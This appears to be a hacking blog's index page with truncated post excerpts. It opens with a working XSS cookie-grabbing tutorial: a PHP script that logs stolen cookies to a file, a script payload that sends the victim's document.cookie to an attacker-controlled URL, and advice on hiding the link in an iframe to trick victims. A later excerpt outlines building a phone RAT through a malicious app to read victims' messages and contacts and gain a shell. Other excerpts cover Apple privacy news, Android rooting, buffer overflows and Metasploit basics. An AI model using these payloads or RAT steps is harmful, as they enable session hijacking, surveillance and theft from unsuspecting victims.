Info And World

Cookie Grabbing using XSS:- <?php $cookie=$_GET[‘cookie’];     //storing cookies in a variable called $cookie. $file=fopen(“cookies.txt”,”a”);  //opening a file called cookies.txt with append mode. fwrite($file,$cookie.”\n\n\n); fclose($file); ?> Save it as “ 1.php “ ------------------------------------------------ Now the url looks like : www.site.com/some_folder/1.php ----------------------------------------------- Find vuln in a site then put it like this below : http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/somefolder/1.php?cookie='.concat(escape(document.cookie));</script>  now send this link but,mostly people wont click it because they find this url very suspicious. So u need to mask it ------------------------------------- Ex: <iframe src="http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/somefolder/1.php?cookie='.co...

Mac OS X 10.10 Yosemite Sends User Location and Safari Search Data to Apple Apple's latest desktop operating system, known as Mac OS X 10.10 Yosemite , sends location and search data of users without their knowledge to Apple's remote servers by default whenever a user queries the desktop search tool Spotlight, which questions users' privacy once again. The technology firm faced criticism on Monday when users came to know about the company's About Spotlight & Privacy which clearly states that anyone who uses the Spotlight feature in either Mac OS X 10.10 Yosemite or its newly launched mobile operating system iOS 8 will have their location and search information passed back to Apple's servers to process. APPLE COLLECTS USERS' DATA AND FORWARDS IT TO MICROSOFT AS WELL On one hand, where Apple decided to enable hard drive encryption by default, despite the FBI requests not to do so. But on the other, the company is itse...

Today, i’m talking about how to hack any Android, iPhone and Blackberry mobile phone. Recently, i posted how to download, install run backtrack 5 in windows.  Works a lot like your regular RAT. You configure an Xampp server on your computer and once people install your app you can control them from your own phone. You can read all there messages, contacts and get shell access. Requirements: 1. Backtrack 5 r3 (using backtrack for this example as SPF is pre-installed), i recently posted a article, how to download, install and run backtrack 5 in windows . 2. Portforwarding (if you are using this outside of your own network) 3. Xampp for linux (guide to installing this will be in the tutorial) 4. A phone (for example I will be using my Android Phone) Step 1) Installing Xampp: First of all, go Here to get Xampp. Once xampp has finished downloading, go to your home directory and you should have a file called “ download.php?xampp-linux-1.7.3a.tar.gz ” rena...

Rooting your Android #su TryNotToBreakAnything.sh We've talked a lot about root and Android in the past five years. We've discussed the good , we've discussed the bad . We'll keep talking about both, because root on Android, like Android itself, is a constantly evolving thing. As Android matures, the wide-open style of root access we may have grown used to with legacy versions has gone away . Because Android is designed for mobile devices, the focus is on security — specifically the security of your life's data you might have stored away on that screen in your pocket. We've seen Android go from the wild-west days of unfettered Superuser access, to locked down and tamper-proof (well, they try to be) devices meant for folks who need the extra level for their business details. For some of us, this is a hinderance and we don't want Google or the folks who made our phone trying to protect us from ourselves. But for each pers...

1. Memory Note: The way I describe it here, memory for a process is organized on most computers, however it depends on the type of processor architecture. This example is for x86 and also roughly applies to sparc. The principle of exploiting a buffer overflow is to overwrite parts of memory which aren't supposed to be overwritten by arbitrary input and making the process execute this code. To see how and where an overflow takes place, lets take a look at how memory is organized. A page is a part of memory that uses its own relative addressing, meaning the kernel allocates initial memory for the process, which it can then access without having to know where the memory is physically located in RAM. The processes memory consists of three sections: - code segment, data in this segment are assembler instructions that the processor executes. The code execution is non-linear, it can skip code, jump, and call functions on certain conditions. Therefore, we have a po...

Metasploit Terms Exploit – to take advantage of a security flaw within a system, network, or application. Payload  – is code that our victim computer to execute by the metasploit framework. Module  – a small piece of code that can be added to the metasploit framework to execute an attack. Shellcode – a small piece of code used as a payload. MSFconsole Msfconsole is an all-in-one interface to most of the features in metasploit. Msfconsole can be used to launch attacks, creating listeners, and much, much more. We will be using Msfconsole throughout these tutorials, but mastering it will allow you to keep up with metaspolits rapidly changing framework. Metasploit comes installed by default on backtrack 5. To access msfconsole, open your console and type: root@bt: ~# cd /opt/framework3/msf3/ root@bt: ~#/opt/framework3/msf3# msfconsole After sometime, the msfconsole will boot. To view the help files, simply type help followed by...